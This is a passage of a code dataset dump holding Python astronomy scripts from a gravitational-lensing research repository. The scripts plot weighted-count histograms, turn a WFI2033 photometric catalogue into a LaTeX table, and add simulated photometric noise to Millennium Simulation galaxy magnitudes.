plt.setp(plt.xticks()[1], rotation=90)\n    subplot = i+1\n    print \"finished subplot %d/18; fraction of points inside the < %s cut: W1_50 %.3f \\n W2_50 %.3f \\n W3_50 %.3f \\n W4_50 %.3f \" % (subplot, limit, float(q_W1_50.size)/q_W1_50read[0].size, float(q_W2_50.size)/q_W2_50read[0].size, float(q_W3_50.size)/q_W3_50read[0].size, float(q_W4_50.size)/q_W4_50read[0].size)\n\nax=plt.subplot(6,3,1, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,2, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,3, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,4, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,5, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,6, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,7, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,8, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,9, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,10, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,11, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,12, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,13, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,14, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,15, sharex=ax1, 
sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nplt.tick_params(axis='x', labelbottom='off')\nax=plt.subplot(6,3,17, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nax=plt.subplot(6,3,18, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\n\nplt.subplots_adjust(left=0.05, bottom=0.15, right=0.95, top=0.98, wspace=0, hspace=0)\n#plt.subplot(6,3,5)\n#plt.legend(bbox_to_anchor=(1, 1),loc='lower right', borderaxespad=0., fontsize=10)\n#plt.legend(bbox_to_anchor=(5, -5), loc='lower right', borderaxespad=0., fontsize=10)\n\n# for some reason I need to add the lines below, or the last plot is not displayed\n#plt.subplots_adjust(top=0.6)\n#plt.tight_layout()\n\n#fig.text(0.5, 0.05, '$\\zeta^\\mathrm{meds,WX}_{q}$', ha='center', va='center', size='20')\nif ((radius == \"45\") & (mag == \"23\") & (mode == \"meds\")):\n fig.text(0.5, 0.05, r\"$\\zeta^\\mathrm{meds,WX}_{q,45'',i<23}$\", ha='center', va='center', size='20')\nif ((radius == \"120\") & (mag == \"23\") & (mode == \"meds\")):\n fig.text(0.5, 0.05, r\"$\\zeta^\\mathrm{meds,WX}_{q,120'',i<23}$\", ha='center', va='center', size='20')\nif ((radius == \"120\") & (mag == \"24\") & (mode == \"sum\")):\n fig.text(0.5, 0.05, r\"$\\zeta^\\mathrm{sum,WX}_{q,120'',i<24}$\", ha='center', va='center', size='20')\n#fig.text(0.05, 0.5, 'normalized counts', ha='center', va='center', size='20', rotation='vertical')\nplt.savefig('%s%s_weightedcountshist_%sarcsec_%sinner_%s_%s_%s_%s_%s%s_zgap%s_%s_notext.png' % (root, lens, radius, inner, mag, mode, photz, detect, irac, handpicked, zinf, zsup), dpi=500)\n\nprint(\" --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.4580594301223755, "alphanum_fraction": 0.5569287538528442, "avg_line_length": 29.669355392456055, "blob_id": "36abe022828771a8340a6564901faee96c4d082e", "content_id": "7984b925dc36f4b3a5011cd86c3ae12203485765", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3803, "license_type": "no_license", "max_line_length": 684, "num_lines": 124, "path": "/python/catalogue_utilities/tabletotex_Sluse18phot copy.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Takes a table and returns a custom latex version content\nimport numpy as np\nimport os\nfrom os import system\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\n\n################## read catalogue\nfilein = '/Users/cerusu/Dropbox/Davis_work/code/WFI2033/IRAC_noeasytemplateerrors_irmatched.cat'\nra = 2\ndec = 3\nitot = 4\nitot_err = 5\nu = 9\nu_err = 10\ng = 11\ng_err = 12\nr = 13\nr_err = 14\ni = 15\ni_err = 16\nz = 17\nz_err = 18\nY = 19\nY_err = 20\nJ = 21\nJ_err = 22\nH = 23\nH_err = 24\nK = 25\nK_err = 26\nch1 = 74\nch1_err = 102\nch2 = 76\nch2_err = 104\nch3 = 78\nch3_err = 106\nch4 = 80\nch4_err = 108\nclass_eazy = 98\ndata = np.loadtxt(filein,usecols=[ra,dec,itot,itot_err,u,u_err,g,g_err,r,r_err,i,i_err,z,z_err,Y,Y_err,J,J_err,H,H_err,K,K_err,ch1,ch1_err,ch2,ch2_err,ch3,ch3_err,ch4,ch4_err,class_eazy],unpack=False)\nprint np.shape(data)\nra = 0\ndec = 1\nitot = 2\nitot_err = 3\nu = 4\nu_err = 5\ng = 6\ng_err = 7\nr = 8\nr_err = 9\ni = 10\ni_err = 11\nz = 12\nz_err = 13\nY = 14\nY_err = 15\nJ = 16\nJ_err = 17\nH = 18\nH_err = 19\nK = 20\nK_err = 21\nch1 = 22\nch1_err = 23\nch2 = 24\nch2_err = 25\nch3 = 26\nch3_err = 27\nch4 = 28\nch4_err = 
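# --- Aside (hedged sketch): the os.system('sed -i -e ...') calls near the end of this script blank out missing-photometry cells in the LaTeX table; a roughly equivalent pure-Python form (literal rather than regex replacement), reusing the same strin/strout variables, would be:\n#   txt = open(fileout).read().replace(strin, strout)\n#   open(fileout, 'w').write(txt)\n# --- end aside; the assignment below continues the original code (ch4_err = 29).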
29\nclass_eazy = 30\nlens = SkyCoord(308.4253, -47.39528, unit='deg')\nx = SkyCoord(243.079849, 53.012886, unit='deg')\nx = SkyCoord(data[:,ra], data[:,dec], unit='deg')\nsep = x.separation(lens).arcsec\ndata = np.c_[data,sep]\nsep = 31\n\n################## impose conditions\ndata = data[data[:,itot] <= 23]\ndata = data[data[:,class_eazy] >= 0]\ndata = data[data[:,sep] <= 120]\nu_corr = +1.40\ng_corr = -0.03\nr_corr = -0.00\ni_corr = 0.00\nz_corr = -0.01\nY_corr = -0.07\nJ_corr = -0.10\nH_corr = -0.01\nK_corr = +0.06\n# conversion from Vega to AB; assuming that the input mags are in Vega\nJ_corr += 0.94\nH_corr += 1.35\nK_corr += 1.83\ndata[:,u][data[:,u] < 99] = data[:,u][data[:,u] < 99] + u_corr\ndata[:,u_err][data[:,u] == 99] = 99\ndata[:,g][data[:,g] < 99] = data[:,g][data[:,g] < 99] + g_corr\ndata[:,g_err][data[:,g] == 99] = 99\ndata[:,r][data[:,r] < 99] = data[:,r][data[:,r] < 99] + r_corr\ndata[:,r_err][data[:,r] == 99] = 99\ndata[:,z][data[:,z] < 99] = data[:,z][data[:,z] < 99] + z_corr\ndata[:,z_err][data[:,z] == 99] = 99\ndata[:,Y][data[:,Y] < 99] = data[:,Y][data[:,Y] < 99] + Y_corr\ndata[:,Y_err][data[:,Y] == 99] = 99\ndata[:,J][data[:,J] < 99] = data[:,J][data[:,J] < 99] + J_corr\ndata[:,J_err][data[:,J] == 99] = 99\ndata[:,H][data[:,H] < 99] = data[:,H][data[:,H] < 99] + H_corr\ndata[:,H_err][data[:,H] == 99] = 99\ndata[:,K][data[:,K] < 99] = data[:,K][data[:,K] < 99] + K_corr\ndata[:,K_err][data[:,K] == 99] = 99\nprint np.shape(data)\nfileout = '/Users/cerusu/GITHUB/H0LiCOW/papers/WFI2033Environment/table_phot.tex'\nnp.savetxt(fileout,np.c_[data[:,ra],data[:,dec],data[:,itot],data[:,itot_err],data[:,u],data[:,u_err],data[:,g],data[:,g_err],data[:,r],data[:,r_err],data[:,i],data[:,i_err],data[:,z],data[:,z_err],data[:,Y],data[:,Y_err],data[:,J],data[:,J_err],data[:,H],data[:,H_err],data[:,K],data[:,K_err],data[:,ch1],data[:,ch1_err],data[:,ch2],data[:,ch2_err],data[:,ch3],data[:,ch3_err],data[:,ch4],data[:,ch4_err]],fmt='%.5f & $%.5f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ \\\\\\\\')\nstrin = '-99.00 \\\\\\pm -99.00'\nstrout = '-'\nos.system(\"sed -i -e \\'s/%s/%s/g\\' %s\" % (strin,strout,fileout))\nstrin = '99.00 \\\\\\pm 99.00'\nstrout = '-'\nos.system(\"sed -i -e \\'s/%s/%s/g\\' %s\" % (strin,strout,fileout))\n\n#np.savetxt(masterfile[:-4] + \"_WFI2033noIRACeazy_nobeta_testduplicate.cat\",data.T,fmt='%s %s %s %s %.2f %.2f %d %d %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f')\n" }, { "alpha_fraction": 0.47536739706993103, "alphanum_fraction": 0.5862084627151489, "avg_line_length": 87.51195526123047, "blob_id": "c115a1666063f797bdab128a27ba346df8a36610", "content_id": "cf59418890147de8c162e459a40f8628e0506a15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 44433, "license_type": "no_license", "max_line_length": 441, "num_lines": 502, "path": "/python/catalogue_utilities/extractMillennium_SA.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# This code samples from the Millenium Simulation (MS) photometry, assuming observed CFHTLenS-like or observed lens-like uncertainties. 
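# --- Aside (hedged sketch of the two-step noise model used in this script): each band error is drawn from a lognormal fit to the observed error-magnitude relation, and the magnitude is then rescattered by that error; per object, schematically:\n#   err = np.exp(np.random.normal(lnmed, lnsig))   # lnmed, lnsig: hypothetical shorthand for the error-table columns\n#   mag = np.random.normal(mag_true, err)\n# (the script writes np.e as the literal 2.718, which is the same operation to four significant figures)\n# --- end aside; the sentence below continues the opening comment.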
The files it creates will be used by photozMillenium.py\n# run as: python extractMillenium.py GGL_los_8_0_0_0_0_N_4096_ang_4_SA_galaxies_on_plane_27_to_63.images.txt\n\nimport numpy as np\nimport sys\n\nlens = \"0408\"\nilim = 22.5\nfilters = \"griz\"\nrootin = \"/Volumes/LaCieDavis/lensing_simulations/SA_galaxies/original/original/\"\nrootout = \"/Volumes/LaCieDavis/lensing_simulations/SA_galaxies/original/%s/\" % lens\nfilein = str(sys.argv[1])\n#fileout_ugriz = rootout+filein[:-11] + \"_ugriz.images.txt\"\n#fileout_ugrizJHK = rootout+filein[:-11] + \"_%s_%s.images.txt\" % (filters,lens)\nfileout = rootout + filein[:-11] + \"_%s_%s.images.txt\" % (filters,lens)\n\nid = 0\nzspec = 5\nposx = 6\nposy = 7\n#mhalo = 9\n#mstar = 11\n#u = 12\ng = 13\nr = 14\ni = 15\nz = 16\n#J = 17\n#H = 18\n#K = 19\n\n#data = np.loadtxt(rootin+filein,usecols=[id,zspec,posx,posy,mhalo,mstar,u,g,r,i,z,K],comments='GalID',unpack=True)\ndata = np.loadtxt(rootin+filein,usecols=[id,zspec,posx,posy,g,r,i,z],comments='GalID',unpack=True)\n\n# reposition labels\n#id = 0\n#zspec = 1\n#posx = 2\n#posy = 3\n#mhalo = 4\n#mstar = 5\n#u = 6\n#g = 7\n#r = 8\n#i = 9\n#z = 10\n#K = 11\n\nid = 0\nzspec = 1\nposx = 2\nposy = 3\ng = 4\nr = 5\ni = 6\nz = 7\n\ndef positive(x):\n x[x<0.01] = 0.01\n return x\n\n#dataout = np.zeros([np.shape(data)[0]+9,np.shape(data)[1]]) # use this instead of dataout since I am modifying the content but I will still need the original content when working with multiple sets of filters\ndataout = np.zeros([np.shape(data)[0]+4,np.shape(data)[1]])\n\n\n# name dataout labels\n# o stands for out\n#id_o = 0\n#zspec_o = 1\n#posx_o = 2\n#posy_o = 3\n#mhalo_o = 4\n#mstar_o = 5\n#iorig_o = 6\n#u_o = 7\n#uerr_o = 8\n#g_o = 9\n#gerr_o = 10\n#r_o = 11\n#rerr_o = 12\n#i_o = 13\n#ierr_o = 14\n#z_o = 15\n#zerr_o = 16\n#K_o = 17\n#Kerr_o = 18\n\nid_o = 0\nzspec_o = 1\nposx_o = 2\nposy_o = 3\ng_o = 4\ngerr_o = 5\nr_o = 6\nrerr_o = 7\ni_o = 8\nierr_o = 9\nz_o = 10\nzerr_o = 11\n\ndataout[id_o] = np.copy(data[id])\ndataout[zspec_o] = np.copy(data[zspec])\ndataout[posx_o] = np.copy(data[posx])\ndataout[posy_o] = np.copy(data[posy])\n#dataout[mhalo_o] = np.copy(data[mhalo])\n#dataout[mstar_o] = np.copy(data[mstar])\n#dataout[iorig_o] = np.copy(data[i])\n#dataout[u_o] = np.copy(data[u])\ndataout[g_o] = np.copy(data[g])\ndataout[r_o] = np.copy(data[r])\ndataout[i_o] = np.copy(data[i])\ndataout[z_o] = np.copy(data[z])\n#dataout[K_o] = np.copy(data[K])\n\n''' Sampling the photometry by assuming error bars from the observations. 
First assign the non-fixed error bar, then sample a new photometry point'''\nif lens == \"0408\":\n# griz (DES-like)\n file_errorbars = \"/Users/cerusu/Dropbox/Davis_work/code/0408/median_errors_hlin_12Aug2019edited.txt\"\n err = np.loadtxt(file_errorbars,unpack=True)\n err_maginf = 0\n err_magsup = 1\n err_g_lnmed = 2\n err_g_lnsig = 3\n err_r_lnmed = 5\n err_r_lnsig = 6\n err_i_lnmed = 8\n err_i_lnsig = 9\n err_z_lnmed = 11\n err_z_lnsig = 12\n\n dataout[gerr_o][dataout[g_o] < err[err_maginf][0]] = 2.718 ** np.random.normal(err[err_g_lnmed][0], err[err_g_lnsig][0], len(dataout[gerr_o][dataout[g_o] < err[err_maginf][0]]))\n for j in range(len(err[0])):\n dataout[gerr_o][(dataout[g_o] >= err[err_maginf][j]) & (dataout[g_o] < err[err_magsup][j])] = 2.718 ** np.random.normal(err[err_g_lnmed][j], err[err_g_lnsig][j], len(dataout[gerr_o][(dataout[g_o] >= err[err_maginf][j]) & (dataout[g_o] < err[err_magsup][j])]))\n dataout[gerr_o][dataout[g_o] >= err[err_magsup][-1]] = 2.718 ** np.random.normal(err[err_g_lnmed][-1], err[err_g_lnsig][-1], len(dataout[gerr_o][dataout[g_o] >= err[err_magsup][-1]]))\n\n dataout[rerr_o][dataout[r_o] < err[err_maginf][0]] = 2.718 ** np.random.normal(err[err_r_lnmed][0], err[err_r_lnsig][0], len(dataout[rerr_o][dataout[r_o] < err[err_maginf][0]]))\n for j in range(len(err[0])):\n dataout[rerr_o][(dataout[r_o] >= err[err_maginf][j]) & (dataout[r_o] < err[err_magsup][j])] = 2.718 ** np.random.normal(err[err_r_lnmed][j], err[err_r_lnsig][j], len(dataout[rerr_o][(dataout[r_o] >= err[err_maginf][j]) & (dataout[r_o] < err[err_magsup][j])]))\n dataout[rerr_o][dataout[r_o] >= err[err_magsup][-1]] = 2.718 ** np.random.normal(err[err_r_lnmed][-1], err[err_r_lnsig][-1], len(dataout[rerr_o][dataout[r_o] >= err[err_magsup][-1]]))\n\n dataout[ierr_o][dataout[i_o] < err[err_maginf][0]] = 2.718 ** np.random.normal(err[err_i_lnmed][0], err[err_i_lnsig][0], len(dataout[ierr_o][dataout[i_o] < err[err_maginf][0]]))\n for j in range(len(err[0])):\n dataout[ierr_o][(dataout[i_o] >= err[err_maginf][j]) & (dataout[i_o] < err[err_magsup][j])] = 2.718 ** np.random.normal(err[err_i_lnmed][j], err[err_i_lnsig][j], len(dataout[ierr_o][(dataout[i_o] >= err[err_maginf][j]) & (dataout[i_o] < err[err_magsup][j])]))\n dataout[ierr_o][dataout[i_o] >= err[err_magsup][-1]] = 2.718 ** np.random.normal(err[err_i_lnmed][-1], err[err_i_lnsig][-1], len(dataout[ierr_o][dataout[i_o] >= err[err_magsup][-1]]))\n\n dataout[zerr_o][dataout[z_o] < err[err_maginf][0]] = 2.718 ** np.random.normal(err[err_z_lnmed][0], err[err_z_lnsig][0], len(dataout[zerr_o][dataout[z_o] < err[err_maginf][0]]))\n for j in range(len(err[0])):\n dataout[zerr_o][(dataout[z_o] >= err[err_maginf][j]) & (dataout[z_o] < err[err_magsup][j])] = 2.718 ** np.random.normal(err[err_z_lnmed][j], err[err_z_lnsig][j], len(dataout[zerr_o][(dataout[z_o] >= err[err_maginf][j]) & (dataout[z_o] < err[err_magsup][j])]))\n dataout[zerr_o][dataout[z_o] >= err[err_magsup][-1]] = 2.718 ** np.random.normal(err[err_z_lnmed][-1], err[err_z_lnsig][-1], len(dataout[zerr_o][dataout[z_o] >= err[err_magsup][-1]]))\n\n# ugriz (CFHTLenS-like)\n#dataout[uerr_o][data[u]<23] = positive(np.random.normal(0.0076, 0.0021, len(data[u][data[u]<23])))\n#dataout[uerr_o][(data[u]>=23) & (data[u]<24)] = positive(np.random.normal(0.0136, 0.0046, len(data[u][(data[u]>=23) & (data[u]<24)])))\n#dataout[uerr_o][(data[u]>=24) & (data[u]<24.5)] = positive(np.random.normal(0.0212, 0.0072, len(data[u][(data[u]>=24) & (data[u]<24.5)])))\n#dataout[uerr_o][(data[u]>=24.5) & (data[u]<25)] = 
positive(np.random.normal(0.0308, 0.0113, len(data[u][(data[u]>=24.5) & (data[u]<25)])))\n#dataout[uerr_o][(data[u]>=25) & (data[u]<25.5)] = positive(np.random.normal(0.0451, 0.0166, len(data[u][(data[u]>=25) & (data[u]<25.5)])))\n#dataout[uerr_o][(data[u]>=25.5) & (data[u]<26)] = positive(np.random.normal(0.0689, 0.0230, len(data[u][(data[u]>=25.5) & (data[u]<26)])))\n#dataout[uerr_o][(data[u]>=26) & (data[u]<26.5)] = positive(np.random.normal(0.1054, 0.0308, len(data[u][(data[u]>=26) & (data[u]<26.5)])))\n#dataout[uerr_o][(data[u]>=26.5) & (data[u]<26.75)] = positive(np.random.normal(0.1430, 0.0357, len(data[u][(data[u]>=26.5) & (data[u]<26.75)])))\n#dataout[uerr_o][(data[u]>=26.75) & (data[u]<27)] = positive(np.random.normal(0.1735, 0.0413, len(data[u][(data[u]>=26.75) & (data[u]<27)])))\n#dataout[uerr_o][(data[u]>=27) & (data[u]<27.25)] = positive(np.random.normal(0.2100, 0.0498, len(data[u][(data[u]>=27) & (data[u]<27.25)])))\n#dataout[uerr_o][(data[u]>=27.25) & (data[u]<27.5)] = positive(np.random.normal(0.2576, 0.0584, len(data[u][(data[u]>=27.25) & (data[u]<27.5)])))\n#dataout[uerr_o][(data[u]>=27.5) & (data[u]<27.75)] = positive(np.random.normal(0.3070, 0.0661, len(data[u][(data[u]>=27.5) & (data[u]<27.75)])))\n#dataout[uerr_o][data[u]>=27.75] = positive(np.random.normal(0.4078, 0.0959, len(data[u][data[u]>=27.75])))\n\n#dataout[gerr_o][data[g]<24] = positive(np.random.normal(0.0098, 0.0038, len(data[g][data[g]<24])))\n#dataout[gerr_o][(data[g]>=24) & (data[g]<24.5)] = positive(np.random.normal(0.0156, 0.0062, len(data[g][(data[g]>=24) & (data[g]<24.5)])))\n#dataout[gerr_o][(data[g]>=24.5) & (data[g]<25)] = positive(np.random.normal(0.0227, 0.0100, len(data[g][(data[g]>=24.5) & (data[g]<25)])))\n#dataout[gerr_o][(data[g]>=25) & (data[g]<25.5)] = positive(np.random.normal(0.0339, 0.0141, len(data[g][(data[g]>=25) & (data[g]<25.5)])))\n#dataout[gerr_o][(data[g]>=25.5) & (data[g]<26)] = positive(np.random.normal(0.0514, 0.0213, len(data[g][(data[g]>=25.5) & (data[g]<26)])))\n#dataout[gerr_o][(data[g]>=26) & (data[g]<26.5)] = positive(np.random.normal(0.0778, 0.0237, len(data[g][(data[g]>=26) & (data[g]<26.5)])))\n#dataout[gerr_o][(data[g]>=26.5) & (data[g]<26.75)] = positive(np.random.normal(0.1080, 0.0300, len(data[g][(data[g]>=26.5) & (data[g]<26.75)])))\n#dataout[gerr_o][(data[g]>=26.75) & (data[g]<27)] = positive(np.random.normal(0.1329, 0.0308, len(data[g][(data[g]>=26.75) & (data[g]<27)])))\n#dataout[gerr_o][(data[g]>=27) & (data[g]<27.25)] = positive(np.random.normal(0.1548, 0.0410, len(data[g][(data[g]>=27) & (data[g]<27.25)])))\n#dataout[gerr_o][(data[g]>=27.25) & (data[g]<27.5)] = positive(np.random.normal(0.1881, 0.0327, len(data[g][(data[g]>=27.25) & (data[g]<27.5)])))\n#dataout[gerr_o][(data[g]>=27.5) & (data[g]<27.75)] = positive(np.random.normal(0.2331, 0.0229, len(data[g][(data[g]>=27.5) & (data[g]<27.75)])))\n#dataout[gerr_o][data[g]>=27.75] = positive(np.random.normal(0.2817, 0.1344, len(data[g][data[g]>=27.75])))\n\n#dataout[rerr_o][data[r]<23] = positive(np.random.normal(0.0064, 0.0022, len(data[r][data[r]<23])))\n#dataout[rerr_o][(data[r]>=23) & (data[r]<24)] = positive(np.random.normal(0.0126, 0.0055, len(data[r][(data[r]>=23) & (data[r]<24)])))\n#dataout[rerr_o][(data[r]>=24) & (data[r]<24.5)] = positive(np.random.normal(0.0203, 0.0084, len(data[r][(data[r]>=24) & (data[r]<24.5)])))\n#dataout[rerr_o][(data[r]>=24.5) & (data[r]<25)] = positive(np.random.normal(0.0293, 0.0147, len(data[r][(data[r]>=24.5) & (data[r]<25)])))\n#dataout[rerr_o][(data[r]>=25) & 
(data[r]<25.5)] = positive(np.random.normal(0.0419, 0.0147, len(data[r][(data[r]>=25) & (data[r]<25.5)])))\n#dataout[rerr_o][(data[r]>=25.5) & (data[r]<26)] = positive(np.random.normal(0.0647, 0.0255, len(data[r][(data[r]>=25.5) & (data[r]<26)])))\n#dataout[rerr_o][(data[r]>=26) & (data[r]<26.5)] = positive(np.random.normal(0.0834, 0.0196, len(data[r][(data[r]>=26) & (data[r]<26.5)])))\n#dataout[rerr_o][(data[r]>=26.5) & (data[r]<26.75)] = positive(np.random.normal(0.1261, 0.0277, len(data[r][(data[r]>=26.5) & (data[r]<26.75)])))\n#dataout[rerr_o][(data[r]>=26.75) & (data[r]<27)] = positive(np.random.normal(0.1403, 0.0134, len(data[r][(data[r]>=26.75) & (data[r]<27)])))\n#dataout[rerr_o][data[r]>=27] = positive(np.random.normal(0.1943, 0.0152, len(data[r][data[r]>=27])))\n\n#dataout[ierr_o][data[i]<23] = positive(np.random.normal(0.0049, 0.0030, len(data[i][data[i]<23])))\n#dataout[ierr_o][(data[i]>=23) & (data[i]<23.5)] = positive(np.random.normal(0.0115, 0.0051, len(data[i][(data[i]>=23) & (data[i]<23.5)])))\n#dataout[ierr_o][(data[i]>=23.5) & (data[i]<23.75)] = positive(np.random.normal(0.0155, 0.0066, len(data[i][(data[i]>=23.5) & (data[i]<23.75)])))\n#dataout[ierr_o][data[i]>=23.75] = positive(np.random.normal(0.0193, 0.0078, len(data[i][data[i]>=23.75])))\n\n#dataout[zerr_o][data[z]<21] = positive(np.random.normal(0.0056, 0.0026, len(data[z][data[z]<21])))\n#dataout[zerr_o][(data[z]>=21) & (data[z]<21.5)] = positive(np.random.normal(0.0102, 0.0032, len(data[z][(data[z]>=21) & (data[z]<21.5)])))\n#dataout[zerr_o][(data[z]>=21.5) & (data[z]<22)] = positive(np.random.normal(0.0146, 0.0043, len(data[z][(data[z]>=21.5) & (data[z]<22)])))\n#dataout[zerr_o][(data[z]>=22) & (data[z]<22.5)] = positive(np.random.normal(0.0212, 0.0084, len(data[z][(data[z]>=22) & (data[z]<22.5)])))\n#dataout[zerr_o][(data[z]>=22.5) & (data[z]<23)] = positive(np.random.normal(0.0315, 0.0126, len(data[z][(data[z]>=22.5) & (data[z]<23)])))\n#dataout[zerr_o][(data[z]>=23) & (data[z]<23.5)] = positive(np.random.normal(0.0480, 0.0182, len(data[z][(data[z]>=23) & (data[z]<23.5)])))\n#dataout[zerr_o][(data[z]>=23.5) & (data[z]<24)] = positive(np.random.normal(0.0721, 0.0244, len(data[z][(data[z]>=23.5) & (data[z]<24)])))\n#dataout[zerr_o][(data[z]>=24) & (data[z]<24.25)] = positive(np.random.normal(0.1099, 0.0304, len(data[z][(data[z]>=24) & (data[z]<24.25)])))\n#dataout[zerr_o][(data[z]>=24.25) & (data[z]<24.5)] = positive(np.random.normal(0.1412, 0.0359, len(data[z][(data[z]>=24.25) & (data[z]<24.5)])))\n#dataout[zerr_o][(data[z]>=24.5) & (data[z]<24.75)] = positive(np.random.normal(0.1714, 0.0367, len(data[z][(data[z]>=24.5) & (data[z]<24.75)])))\n#dataout[zerr_o][(data[z]>=24.75) & (data[z]<25)] = positive(np.random.normal(0.2162, 0.0354, len(data[z][(data[z]>=24.75) & (data[z]<25)])))\n#dataout[zerr_o][data[z]>=25] = positive(np.random.normal(0.2525, 0.0346, len(data[z][data[z]>=25])))\n\n#dataout[u_o] = np.random.normal(dataout[u_o], dataout[uerr_o])\ndataout[g_o] = np.random.normal(dataout[g_o], dataout[gerr_o])\ndataout[r_o] = np.random.normal(dataout[r_o], dataout[rerr_o])\ndataout[i_o] = np.random.normal(dataout[i_o], dataout[ierr_o])\ndataout[z_o] = np.random.normal(dataout[z_o], dataout[zerr_o])\n\ndataout[gerr_o][dataout[gerr_o] <= 0.01] = 0.01\ndataout[rerr_o][dataout[rerr_o] <= 0.01] = 0.01\ndataout[ierr_o][dataout[ierr_o] <= 0.01] = 0.01\ndataout[zerr_o][dataout[zerr_o] <= 0.01] = 0.01\n\n# eliminate objects that are i> 24 in both the original iorig and the randomized i\n#dataout = 
np.delete(dataout,np.where((dataout[i_o] > 24) & (dataout[iorig_o] > 24)),axis=1)\ndataout = np.delete(dataout,np.where(dataout[i_o] > ilim),axis=1)\n\n# applying 1-sigma detection limits from Erben et al. 2013, including its uncertainty\n#dataout[u_o][dataout[u_o]>=np.random.normal(25.24+1.75, 0.17, len(dataout[u_o]))] = 99.0\n#dataout[g_o][dataout[g_o]>=np.random.normal(25.58+1.75, 0.15, len(dataout[g_o]))] = 99.0\n#dataout[r_o][dataout[r_o]>=np.random.normal(24.88+1.75, 0.16, len(dataout[r_o]))] = 99.0\n#dataout[z_o][dataout[z_o]>=np.random.normal(23.46+1.75, 0.20, len(dataout[z_o]))] = 99.0\n#dataout[uerr_o][dataout[u_o]==99.0] = 25.24+1.75\n#dataout[gerr_o][dataout[g_o]==99.0] = 25.58+1.75\n#dataout[rerr_o][dataout[r_o]==99.0] = 24.88+1.75\n#dataout[zerr_o][dataout[z_o]==99.0] = 23.46+1.75\n\n#head = \"GalID \\t z_spec \\t pos_0[rad] \\t pos_1[rad] \\t M_Halo[M_sol/h] \\t M_Stellar[M_sol/h] \\t mag_SDSS_iorig \\t mag_SDSS_u \\t mag_SDSS_uerr \\t mag_SDSS_g \\t mag_SDSS_gerr \\t mag_SDSS_r \\t mag_SDSS_rerr \\t mag_SDSS_i \\t mag_SDSS_ierr \\t mag_SDSS_z \\t mag_SDSS_zerr\" NOT USING THIS ONE BECAUSE THE SPECIAL CHARACTERS ARE NOT RECOGNIZED PROPERLY BY BPZ\n#head = \"GalID \\t z_spec \\t pos0 \\t pos1 \\t M_Halo \\t M_Stellar \\t mag_SDSS_iorig \\t mag_SDSS_u \\t mag_SDSS_uerr \\t mag_SDSS_g \\t mag_SDSS_gerr \\t mag_SDSS_r \\t mag_SDSS_rerr \\t mag_SDSS_i \\t mag_SDSS_ierr \\t mag_SDSS_z \\t mag_SDSS_zerr\"\nif lens == \"0408\": head = \"GalID \\t z_spec \\t pos0 \\t pos1 \\t mag_SDSS_g \\t mag_SDSS_gerr \\t mag_SDSS_r \\t mag_SDSS_rerr \\t mag_SDSS_i \\t mag_SDSS_ierr \\t mag_SDSS_z \\t mag_SDSS_zerr\"\n#np.savetxt(fileout_ugriz,np.c_[dataout[id_o],dataout[zspec_o],dataout[posx_o],dataout[posy_o],dataout[mhalo_o],dataout[mstar_o],dataout[iorig_o],dataout[u_o],dataout[uerr_o],dataout[g_o],dataout[gerr_o],dataout[r_o],dataout[rerr_o],dataout[i_o],dataout[ierr_o],dataout[z_o],dataout[zerr_o]],header=head,fmt='%d \\t %.3f \\t %.7f \\t %.7f \\t %.3e \\t %.3e \\t 